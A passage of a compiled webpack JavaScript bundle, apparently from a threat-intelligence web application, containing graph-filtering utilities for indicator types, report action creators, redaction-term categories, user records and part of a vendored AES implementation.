var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();








var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('web_modules:graph-utils'); // eslint-disable-line no-unused-vars

/* Types
 * ======================================================================= */


/* =======================================================================
 * End Types */

/* This is the single source of truth for our graph's node categories:
   NOTE: we should consolidate type and system at some point to keep this flat: */
var filterCategories = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])({
  'bitcoin_address': { type: 'bitcoin_address', label: 'Bitcoin Address' },
  'cidr_block': { type: 'cidr_block', label: 'CIDR Block' },
  'cve': { type: 'cve', label: 'CVE' },
  'email_address': { type: 'email_address', label: 'Email Address' },
  'ip': { type: 'ip', label: 'IP' },
  'md5': { type: 'md5', label: 'MD5 Hash' },
  'malware': { type: 'malware', label: 'Malware' },
  'registry_key': { type: 'registry_key', label: 'Registry Key' },
  'sha1': { type: 'sha1', label: 'SHA1 Hash' },
  'sha256': { type: 'sha256', label: 'SHA256 Hash' },
  'software': { type: 'software', label: 'Software' },
  'url': { type: 'url', label: 'URL' },
  'phone_number': { type: 'phone_number', label: 'Phone Number' },
  'x_id': { type: 'x_id', label: 'X-ID' },
  'threat_actor': { type: 'threat_actor', label: 'Threat Actor' }
});

var Filters = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  filterText: '',
  inactiveFilters: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])()
});

var getSectorAbrev = function getSectorAbrev(sector) {
  if (!sector || !__WEBPACK_IMPORTED_MODULE_4_lodash_isstring___default()(sector)) {
    // Is this really an issue? This will just stringify whatever
    // we give it and not through an error as far as I know
    // $FlowIssue
    console.warn('Invalid argument passed to getSectorAbrev: ' + sector);
    return '?';
  }

  switch (Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["toLower"])(sector)) {
    case 'information-technology':
    case 'information technology':
      return 'IT';
    case 'aviation':
      return 'AV';
    case 'energy':
      return 'ENG';
    case 'financial-services':
      return 'FS';
    case 'communications':
      return 'COM';
    case 'education':
      return 'EDU';
    case 'manufacturing':
      return 'MFT';
    case 'e-commerce':
    case 'commercial':
      return 'CO';
    case 'entertainment':
      return 'ENT';
    case 'insurance':
      return 'INS';
    case 'food-agriculture':
      return 'AGR';
    case 'automotive':
      return 'AUTO';
    case 'defense':
      return 'DEF';
    case 'government':
      return 'GOV';
    case 'health':
      return 'MED';
    case 'infrastructure':
      return 'INF';
    case 'nuclear':
      return 'NUC';
    case 'retail':
      return 'RTL';
    case 'sports':
      return 'SP';
    case 'transportation':
      return 'TRAN';
    default:
      console.warn('Could not find abreviation for sector ' + Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["toLower"])(sector));
      return '?';
  }
};

var GraphData = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  edges: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])(),
  nodes: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])()
});

/**
 * NOTE: Immutable has no good concept of a tuple, but flow lets us use arrays
 * as tuples by enforcing their shape and length. That's why we use a mutable
 * array here.
 */

var CurrentGraph = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  id: '', // The id of the parent record, currently this means either a report or an analysis
  type: '',
  viewType: '', // The type of graph this is, either 'report' or 'analysis' currently
  indicatorType: null,
  value: null,
  data: GraphData(),
  deletedNodes: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Set"])(), // Ids of deleted nodes
  filters: Filters(),
  timeRange: [0, 0], // Selected time range to view. See NOTE on array usage
  initialSettledState: null // TODO: Remove this and store in graph meta
});

/**
 * NOTE: ForcePositions sometimes become the node in a node list. This means
 * that in the getters we will try to set hasAnnotations on this record.
 * Specifically the "withPositions" getter. Therefore I've added the key here
 * and defaulted it to false.
 */
var ForcePosition = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  id: null,
  x: 0,
  y: 0,
  vx: null,
  vy: null,
  fx: null,
  fy: null,
  index: null,
  hasAnnotations: false // See NOTE
});

/**
 * NOTE: Not sure if the ID filtering is necessary but it was left over from
 * some older logic so I've kept it in.
 */
var toNodePositions = function toNodePositions(_ref) {
  var nodes = _ref.nodes,
      _ref$edges = _ref.edges,
      edges = _ref$edges === undefined ? [] : _ref$edges;

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(nodes).filter(Object(__WEBPACK_IMPORTED_MODULE_1_ramda__["prop"])('id')) // Filter out anything without an ID. See NOTE
  .map(function (x) {
    return ForcePosition(x);
  }).toMap().mapKeys(function (k, v) {
    return v.get('id');
  });
};

var GraphMeta = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  id: null,
  nodePositions: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])(),
  initialSettledState: null
});

var GraphHistory = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  index: 0,
  timeline: Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()
});

var Graph = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  currentGraph: CurrentGraph(),
  history: GraphHistory(), // Undo/redo history
  meta: GraphMeta()
});

var GraphOptions = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  showLabels: false,
  showHelp: false,
  currentPanel: 'details' // Currently either: details | notes
});

/**
 * NOTE: We don't yet know why there would be anything without an id but it was
 * happening and causing unexpected behavior. So as a safety measure for now
 * we're going to filter those out.
 */
var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(list).filter(function (x) {
    return x.get('id');
  }) // Filter out anything without an ID. See NOTE
  .toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  });
};

/**
 * NOTE: Edges are optional since sometimes we want to call this on only a list
 * of nodes.
 */
var toGraphData = function toGraphData(_ref2) {
  var nodes = _ref2.nodes,
      _ref2$edges = _ref2.edges,
      edges = _ref2$edges === undefined ? [] : _ref2$edges;

  return GraphData({
    nodes: listToOrderedMap(nodes),
    edges: listToOrderedMap(edges)
  });
};

/**
 * Filter a map of edges such that none of the edges are connected to any of the
 * node ids represented in the ids Set. This is useful when removing a node from
 * the graph, as we naturally want to remove all connected edges as well.
 *
 * Returns a predicate function that can be passed to a filter function.
 */

var notConnectedToNodes = function notConnectedToNodes(ids) {
  return function (edge) {
    var source = edge.get('source', '');
    var target = edge.get('target', '');

    return !ids.has(source) && !ids.has(target);
  };
};

var connectedByEdges = function connectedByEdges(edges) {
  return function (x) {
    return edges.some(function (edge) {
      var nodeId = x.get('id');
      return edge.get('source') === nodeId || edge.get('target') === nodeId;
    });
  };
};

/**
 * Produces a predicate to determine whether or not an edge has both its source
 * and target nodes in a given list of nodes.
 */
var connectedToNodes = function connectedToNodes(nodes) {
  return function (edge) {
    var source = edge.get('source', '');
    var target = edge.get('target', '');
    return nodes.get(source) && nodes.get(target);
  };
};

/**
 * Takes a graph and a set of inactive filters and returns a Set of node Ids
 * of the nodes from that graph which would be filtered out.
 */
var calculateFiltered = function calculateFiltered(graph, inactiveFiltersMap) {
  var inactiveFilters = inactiveFiltersMap.keySeq();
  return graph.getIn(['data', 'nodes']).filter(function (v, _) {
    var enclaveGuids = v.get('enclaveGuids', []);
    var enclavesIntersect = inactiveFilters.filter(function (f) {
      return enclaveGuids.includes(f);
    }).first();
    var hasType = inactiveFilters.includes(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["toLower"])(v.get('type')));
    var hasSystem = inactiveFilters.includes(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["toLower"])(v.get('system')));
    var hasTag = v.get('type') === 'INDICATOR_TAG' && inactiveFilters.includes(v.get('id'));
    return hasType || hasSystem || enclavesIntersect || hasTag;
  }).map(function (v, k) {
    return v.get('id');
  }).toSet();
};

var isSingleNodeGraph = function isSingleNodeGraph(graph) {
  return !graph.getIn(['data', 'edges']).size && graph.getIn(['data', 'nodes']).size === 1;
};

/**
 * Remove the specified nodes from the graph. Also remove any associated edges
 * and any nodes which would become orphaned if the nodes specified in nodeIds
 * were deleted.
 */
var removeNodes = function removeNodes(graph, nodeIds) {
  /*
   * NOTE: This defaults a graph with a single node and no edges to render, e.g. in the
   * case of an IOC with no correlations.
   *
   * We can revisit/refactor. This logic may be better elsewhere, also we need to
   * be sure this doesn't interfere with any graph when we are filtering or updating
   * the time range.
   *
   */
  if (isSingleNodeGraph(graph)) {
    return graph;
  }

  // remove nodes:
  var edges = graph.getIn(['data', 'edges']).filter(notConnectedToNodes(nodeIds));
  var nodes = graph.getIn(['data', 'nodes']).filter(function (x) {
    return !nodeIds.has(x.get('id'));
  }) // Remove deleted nodes
  .filter(connectedByEdges(edges)); // Remove orphaned nodes

  return graph.set('data', toGraphData({ nodes: nodes, edges: edges }));
};

var filterNodesByTimeRange = function filterNodesByTimeRange(graph, timeRange) {
  var _timeRange = _slicedToArray(timeRange, 2),
      start = _timeRange[0],
      end = _timeRange[1];

  debug('Filtering time range', timeRange);

  // Must have valid timestamps to filter against
  if (!start || !end) return graph;

  var nodes = graph.getIn(['data', 'nodes']).filter(function (x) {
    // Not every node has a timestamp. TODO: Let's rethink this. What do we
    // want to do if a node does not have a timestamp, such as an indicator
    // node? We definitely still want to include it in the graph, but then
    // what if it becomes orphaned? In that case we probably want to remove it
    // as well. So we might need to do the connected by edges check after we
    // have done all this filtering
    var time = x.get('timeBegan') || x.get('time');
    if (!time) return true;

    var created = __WEBPACK_IMPORTED_MODULE_0_moment___default()(time);
    return created.isBetween(start, end, null, '[]');
  });

  var edges = graph.getIn(['data', 'edges']).filter(connectedToNodes(nodes));

  return graph.set('data', toGraphData({ nodes: nodes, edges: edges }));
};

var getNodeTime = function getNodeTime(node) {
  return node.get('timeBegan') || node.get('time');
};

var getNodeTimes = function getNodeTimes(nodes) {
  return nodes.map(getNodeTime).filter(Boolean) // Some nodes don't have timestamps. Filter them out
  .toIndexedSeq().toArray();
};

/***/ }),
/* 409 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearReportList", function() { return clearReportList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "refetchReportsList", function() { return refetchReportsList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchAndStore", function() { return fetchAndStore; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "storeFromLocal", function() { return storeFromLocal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setEnclaveTag", function() { return setEnclaveTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setEnclaveTagsBulk", function() { return setEnclaveTagsBulk; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setAttribute", function() { return setAttribute; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setCurrentReportId", function() { return setCurrentReportId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeEnclaveTag", function() { return removeEnclaveTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeAttribute", function() { return removeAttribute; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeReport", function() { return removeReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reindexReport", function() { return reindexReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportReport", function() { return exportReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "copyReport", function() { return copyReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "moveReport", function() { return moveReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearMetadataCache", function() { return clearMetadataCache; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchReportMetadata", function() { return fetchReportMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchReportMetadataSuccess", function() { return fetchReportMetadataSuccess; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchReportMetadataFailure", function() { return fetchReportMetadataFailure; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types__ = __webpack_require__(92);






/* Clears the report list */
var clearReportList = function clearReportList() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* CLEAR_LIST */] };
};

/**
 * Refetches report list based on whatever the current display options are.
 *
 * NOTE: This clears the existing report list.
 */
var refetchReportsList = function refetchReportsList() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["r" /* REFETCH_REPORTS */] };
};

/**
 * Set display options. Determines sorting and filtering of REPORTS.
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["I" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

var fetchAndStore = function fetchAndStore(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["N" /* STORE */],
    payload: id
  };
};

/**
 * Store a report from another part of state, we are not conforming to report type because it may be partial
 * @param report, a map
 */
var storeFromLocal = function storeFromLocal(report) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["P" /* STORE_FROM_LOCAL */],
    payload: report
  };
};

var setEnclaveTag = function setEnclaveTag(id, enclaveId, name) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["J" /* SET_ENCLAVE_TAG */],
    payload: { id: id, enclaveId: enclaveId, name: name }
  };
};

var setEnclaveTagsBulk = function setEnclaveTagsBulk(id, enclaveIds) {
  var addedTags = arguments.length > 2 && arguments[2] !== undefined ? arguments[2] : [];
  var removedTags = arguments.length > 3 && arguments[3] !== undefined ? arguments[3] : [];
  var alertOnSuccess = arguments.length > 4 && arguments[4] !== undefined ? arguments[4] : true;
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["K" /* SET_ENCLAVE_TAGS_BULK */],
    payload: { id: id, enclaveIds: enclaveIds, addedTags: addedTags, removedTags: removedTags, alertOnSuccess: alertOnSuccess }
  };
};

var setAttribute = function setAttribute(id, name) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["E" /* SET_ATTRIBUTE */],
    payload: { id: id, name: name }
  };
};

var setCurrentReportId = function setCurrentReportId(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["H" /* SET_CURRENT_ID */],
    payload: id
  };
};

var removeEnclaveTag = function removeEnclaveTag(reportId, tagName) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["z" /* REMOVE_ENCLAVE_TAG */],
    payload: { reportId: reportId, tagName: tagName }
  };
};

var removeAttribute = function removeAttribute(reportId, tagName) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["w" /* REMOVE_ATTRIBUTE */],
    payload: { reportId: reportId, tagName: tagName }
  };
};

var removeReport = function removeReport(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["v" /* REMOVE */],
    payload: id
  };
};

var reindexReport = function reindexReport(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["s" /* REINDEX */],
    payload: id
  };
};

var exportReport = function exportReport(id, format) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["f" /* EXPORT_REPORT */],
    payload: { id: id, format: format }
  };
};

var copyReport = function copyReport(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types__["c" /* COPY_REPORT */],
    payload: payload
  };
};
var moveReport = function moveReport(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types__["o" /* MOVE_REPORT */],
    payload: payload
  };
};

/**
 * Report Metadata Cache Actions
 * Metadata cache is used to reduce calls to enrich reports with metadata
 **/

var clearMetadataCache = function clearMetadataCache() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* CLEAR_REPORT_METADATA_CACHE */]
  };
};

var fetchReportMetadata = function fetchReportMetadata(reportIds) {
  var cacheDisabled = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false;
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["k" /* FETCH_METADATA */],
    payload: reportIds,
    meta: { cacheDisabled: cacheDisabled }
  };
};

var fetchReportMetadataSuccess = function fetchReportMetadataSuccess(reportMetadata) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["m" /* FETCH_METADATA_SUCCESS */],
    payload: reportMetadata
  };
};

var fetchReportMetadataFailure = function fetchReportMetadataFailure(error) {
  var errorMessage = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'There was an error fetching report metadata';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["l" /* FETCH_METADATA_FAILURE */],
    payload: error,
    error: true,
    meta: { type: 'error', text: errorMessage }
  };
};

/***/ }),
/* 410 */,
/* 411 */,
/* 412 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return REDACTABLE_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_LIBRARY_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ADD_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DELETE_ENDPOINT; });
/* unused harmony export FETCH_SIZE */
/* unused harmony export categoriesList */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return hyphenate; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return listToOrderedMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return listToTextMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return redactionCategories; });
/* unused harmony export category */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return categoryByName; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return categoryById; });
/* unused harmony export categoryNames */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);



var REDACTABLE_ENDPOINT = '/services/recommendation/extract';

/* Endpoints for shared library AJAX actions */
// TODO: these are all the same, just export one var...
var FETCH_LIBRARY_ENDPOINT = '/services/redaction/terms';
var ADD_ENDPOINT = '/services/redaction/terms'; // -> [ ...terms ] => { savedTerms: [ ...terms ], failedTerms: [ ...terms ] }
var DELETE_ENDPOINT = '/services/redaction/terms'; // + :id

/* The max number of terms to fetch in a given request.
 * This needs to fixed on the server side, but for now 556 is a magical
 * number that means return all. No limit */
var FETCH_SIZE = 556;

/* Hardcode list of term categories */
var categoriesList = [{ id: 1, name: 'Organization' }, { id: 2, name: 'Internal Organization' }, { id: 3, name: 'Partner Organization' }, { id: 4, name: 'Product' }, { id: 5, name: 'Company Site' }, { id: 6, name: 'Company Address' }, { id: 7, name: 'Location' }, { id: 8, name: 'Phone' }, { id: 9, name: 'Person' }, { id: 10, name: 'Username' }, { id: 11, name: 'Email Address' }, { id: 12, name: 'IP Address' }, { id: 13, name: 'URL' }, { id: 14, name: 'Domain' }, { id: 15, name: 'Account Number' }, { id: 18, name: 'Social Security Number' }, { id: 19, name: 'Password' }, { id: 20, name: 'Credit Card' }, { id: 16, name: 'Other Identifying Info' }, { id: 17, name: 'Other' }];

/**
 * Hyphenate a string (and also make it lowercase)
 * Ex: 'Hey there you' -> 'hey-there-you'
 */
var hyphenate = function hyphenate(str) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toLower"])(str, '').replace(/\s/g, '-');
};

var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(list).toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  });
};

var listToTextMap = function listToTextMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(list).toMap().mapKeys(function (k, v) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toLower"])(v.get('text'));
  });
};

var redactionCategories = listToOrderedMap(categoriesList);

/**
 * Get a category by ID. This is currently used to get the name of a category
 * when we only have access to a term. Terms only store the ID of a category so
 * we need a way to get at the name.
 */
var category = function category(id) {
  return redactionCategories.get(id);
};

var categoryByName = function categoryByName(name) {
  return redactionCategories.find(function (x) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toLower"])(x.get('name')) === Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["toLower"])(name);
  });
};

var categoryById = function categoryById(id) {
  return redactionCategories.find(function (x) {
    return x.get('id') === id;
  });
};

/**
 * Getter for category names in the hyphenated form we use for redaction.
 * Currently we use this for highligting already redacted terms in a text body
 */
var categoryNames = redactionCategories.map(function (x) {
  return hyphenate(x.get('name'));
}).toSet();

/***/ }),
/* 413 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return User; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  companyGuid: '',
  enclaveId: '',
  roleId: '',
  sortBy: ['firstName'],
  sortOrder: 'ASC',
  startPage: 0,
  pageSize: 25,
  hasNext: true
});

var User = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  id: null,
  guid: '',
  activationDate: null,
  confirmationDate: null, // Timestamp
  created: null, // Timestamp
  company: null,
  email: '',
  enclaves: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  firstName: '',
  lastLogin: null, // Timestamp
  firstActivationDate: null, // Timestamp
  lastName: '',
  mfaEnabled: false,
  ssoEnabled: false,
  deactivated: false,
  trialUser: false,
  role: null,
  sector: '',
  activationCount: 0
});

/***/ }),
/* 414 */,
/* 415 */,
/* 416 */,
/* 417 */,
/* 418 */,
/* 419 */,
/* 420 */,
/* 421 */,
/* 422 */,
/* 423 */,
/* 424 */,
/* 425 */,
/* 426 */,
/* 427 */,
/* 428 */,
/* 429 */,
/* 430 */,
/* 431 */,
/* 432 */,
/* 433 */,
/* 434 */,
/* 435 */,
/* 436 */,
/* 437 */,
/* 438 */,
/* 439 */,
/* 440 */,
/* 441 */,
/* 442 */,
/* 443 */,
/* 444 */,
/* 445 */,
/* 446 */,
/* 447 */,
/* 448 */,
/* 449 */,
/* 450 */,
/* 451 */,
/* 452 */,
/* 453 */,
/* 454 */,
/* 455 */,
/* 456 */,
/* 457 */,
/* 458 */,
/* 459 */,
/* 460 */,
/* 461 */,
/* 462 */,
/* 463 */,
/* 464 */,
/* 465 */,
/* 466 */,
/* 467 */,
/* 468 */,
/* 469 */,
/* 470 */,
/* 471 */,
/* 472 */,
/* 473 */,
/* 474 */,
/* 475 */,
/* 476 */,
/* 477 */,
/* 478 */,
/* 479 */,
/* 480 */,
/* 481 */,
/* 482 */,
/* 483 */,
/* 484 */,
/* 485 */,
/* 486 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(process) {

if (typeof process === 'undefined' ||
    !process.version ||
    process.version.indexOf('v0.') === 0 ||
    process.version.indexOf('v1.') === 0 && process.version.indexOf('v1.8.') !== 0) {
  module.exports = { nextTick: nextTick };
} else {
  module.exports = process
}

function nextTick(fn, arg1, arg2, arg3) {
  if (typeof fn !== 'function') {
    throw new TypeError('"callback" argument must be a function');
  }
  var len = arguments.length;
  var args, i;
  switch (len) {
  case 0:
  case 1:
    return process.nextTick(fn);
  case 2:
    return process.nextTick(function afterTickOne() {
      fn.call(null, arg1);
    });
  case 3:
    return process.nextTick(function afterTickTwo() {
      fn.call(null, arg1, arg2);
    });
  case 4:
    return process.nextTick(function afterTickThree() {
      fn.call(null, arg1, arg2, arg3);
    });
  default:
    args = new Array(len - 1);
    i = 0;
    while (i < args.length) {
      args[i++] = arguments[i];
    }
    return process.nextTick(function afterTick() {
      fn.apply(null, args);
    });
  }
}


/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(83)))

/***/ }),
/* 487 */,
/* 488 */
/***/ (function(module, exports, __webpack_require__) {

// based on the aes implimentation in triple sec
// https://github.com/keybase/triplesec
// which is in turn based on the one from crypto-js
// https://code.google.com/p/crypto-js/

var Buffer = __webpack_require__(41).Buffer

function asUInt32Array (buf) {
  if (!Buffer.isBuffer(buf)) buf = Buffer.from(buf)

  var len = (buf.length / 4) | 0
  var out = new Array(len)

  for (var i = 0; i < len; i++) {
    out[i] = buf.readUInt32BE(i * 4)
  }

  return out
}

function scrubVec (v) {
  for (var i = 0; i < v.length; v++) {
    v[i] = 0
  }
}

function cryptBlock (M, keySchedule, SUB_MIX, SBOX, nRounds) {
  var SUB_MIX0 = SUB_MIX[0]
  var SUB_MIX1 = SUB_MIX[1]
  var SUB_MIX2 = SUB_MIX[2]
  var SUB_MIX3 = SUB_MIX[3]

  var s0 = M[0] ^ keySchedule[0]
  var s1 = M[1] ^ keySchedule[1]
  var s2 = M[2] ^ keySchedule[2]
  var s3 = M[3] ^ keySchedule[3]
  var t0, t1, t2, t3
  var ksRow = 4

  for (var round = 1; round < nRounds; round++) {
    t0 = SUB_MIX0[s0 >>> 24] ^ SUB_MIX1[(s1 >>> 16) & 0xff] ^ SUB_MIX2[(s2 >>> 8) & 0xff] ^ SUB_MIX3[s3 & 0xff] ^ keySchedule[ksRow++]
    t1 = SUB_MIX0[s1 >>> 24] ^ SUB_MIX1[(s2 >>> 16) & 0xff] ^ SUB_MIX2[(s3 >>> 8) & 0xff] ^ SUB_MIX3[s0 & 0xff] ^ keySchedule[ksRow++]
    t2 = SUB_MIX0[s2 >>> 24] ^ SUB_MIX1[(s3 >>> 16) & 0xff] ^ SUB_MIX2[(s0 >>> 8) & 0xff] ^ SUB_MIX3[s1 & 0xff] ^ keySchedule[ksRow++]
    t3 = SUB_MIX0[s3 >>> 24] ^ SUB_MIX1[(s0 >>> 16) & 0xff] ^ SUB_MIX2[(s1 >>> 8) & 0xff] ^ SUB_MIX3[s2 & 0xff] ^ keySchedule[ksRow++]
    s0 = t0
    s1 = t1
    s2 = t2
    s3 = t3
  }

  t0 = ((SBOX[s0 >>> 24] << 24) | (SBOX[(s1 >>> 16) & 0xff] << 16) | (SBOX[(s2 >>> 8) & 0xff] << 8) | SBOX[s3 & 0xff]) ^ keySchedule[ksRow++]
  t1 = ((SBOX[s1 >>> 24] << 24) | (SBOX[(s2 >>> 16) & 0xff] << 16) | (SBOX[(s3 >>> 8) & 0xff] << 8) | SBOX[s0 & 0xff]) ^ keySchedule[ksRow++]
  t2 = ((SBOX[s2 >>> 24] << 24) | (SBOX[(s3 >>> 16) & 0xff] << 16) | (SBOX[(s0 >>> 8) & 0xff] << 8) | SBOX[s1 & 0xff]) ^ keySchedule[ksRow++]
  t3 = ((SBOX[s3 >>> 24] << 24) | (SBOX[(s0 >>> 16) & 0xff] << 16) | (SBOX[(s1 >>> 8) & 0xff] << 8) | SBOX[s2 & 0xff]) ^ keySchedule[ksRow++]
  t0 = t0 >>> 0
  t1 = t1 >>> 0
  t2 = t2 >>> 0
  t3 = t3 >>> 0

  return [t0, t1, t2, t3]
}

// AES constants
var RCON = [0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36]
var G = (function () {
  // Compute double table
  var d = new Array(256)
  for (var j = 0; j < 256; j++) {
    if (j < 128) {
      d[j] = j << 1
    } else {
      d[j] = (j << 1) ^ 0x11b
    }
  }

  var SBOX = []
  var INV_SBOX = []
  var SUB_MIX = [[], [], [], []]
  var INV_SUB_MIX = [[], [], [], []]

  // Walk GF(2^8)
  var x = 0
  var xi = 0
  for (var i = 0; i < 256; ++i) {
    // Compute sbox
    var sx = xi ^ (xi << 1) ^ (xi << 2) ^ (xi << 3) ^ (xi << 4)
    sx = (sx >>> 8) ^ (sx & 0xff) ^ 0x63
    SBOX[x] = sx
    INV_SBOX[sx] = x

    // Compute multiplication
    var x2 = d[x]
    var x4 = d[x2]
    var x8 = d[x4]

    // Compute sub bytes, mix columns tables
    var t = (d[sx] * 0x101) ^ (sx * 0x1010100)
    SUB_MIX[0][x] = (t << 24) | (t >>> 8)
    SUB_MIX[1][x] = (t << 16) | (t >>> 16)
    SUB_MIX[2][x] = (t << 8) | (t >>> 24)
    SUB_MIX[3][x] = t

    // Compute inv sub bytes, inv mix columns tables
